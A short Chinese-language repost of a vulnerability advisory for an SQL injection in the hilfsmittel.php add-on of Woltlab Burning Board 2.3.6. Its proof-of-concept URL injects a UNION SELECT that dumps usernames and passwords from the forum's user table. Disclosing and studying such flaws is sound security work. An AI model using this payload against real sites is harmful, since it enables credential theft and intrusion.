Woltlab Burning Board 2.3.6 插件SQL注入漏洞漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    Woltlab Burning Board是一款由PHP编写,MySQL后台支持的WEB论坛程序,

Woltlab Burning Board 2.3.6 插件SQL注入漏洞漏洞预警

。Woltlab Burning Board 2.3.6中的hilfsmittel.php插件存在SQL注入漏洞,可能导致敏感信息泄露。

    [+]info:

    ~~~~~~~~~

    Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability

    [+] Autor: Crazyball

    [+] Vulnerabilities [ SQL Injection ]

    [+] Page: http://www.euweb.at/

    [+] Language: [ PHP ]

    [+] Version: Hilfsmitteldatenbank 1.0

    [+] Date: n/a

    [+] Vendor: http://www.woltlab.com/de/

    [+]poc:

    ~~~~~~~~~

    http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16202

最新文章